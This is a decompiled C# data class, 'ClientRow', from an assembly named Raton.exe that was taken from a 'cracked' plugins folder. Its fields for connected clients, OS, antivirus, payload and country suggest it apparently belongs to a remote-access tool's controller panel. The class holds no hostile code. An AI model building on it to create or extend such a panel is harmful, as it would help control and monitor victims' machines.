Files
2026-08-27 11:23:13 -06:00

61 lines
1.4 KiB
C#

// Decompiled with JetBrains decompiler
// Type: WpfApp1.ClientRow
// Assembly: Raton, Version=0.4.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 36C4E416-7F8D-4D23-930F-B5CCB0D810E7
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Raton.exe
using System.ComponentModel;
using System.Windows.Media.Imaging;
#nullable disable
namespace WpfApp1;
public class ClientRow : INotifyPropertyChanged
{
private BitmapImage _flag;
public event PropertyChangedEventHandler PropertyChanged;
private void OnProp(string n)
{
PropertyChangedEventHandler propertyChanged = this.PropertyChanged;
if (propertyChanged == null)
return;
propertyChanged((object) this, new PropertyChangedEventArgs(n));
}
public string Client { get; set; }
public string Tag { get; set; }
public string User { get; set; }
public string ID { get; set; }
public string OS { get; set; }
public string Version { get; set; }
public string Running { get; set; }
public string AV { get; set; }
public string Status { get; set; }
public string Date { get; set; }
public string Payload { get; set; }
public string Country { get; set; }
public BitmapImage Flag
{
get => this._flag;
set
{
this._flag = value;
this.OnProp(nameof (Flag));
}
}
}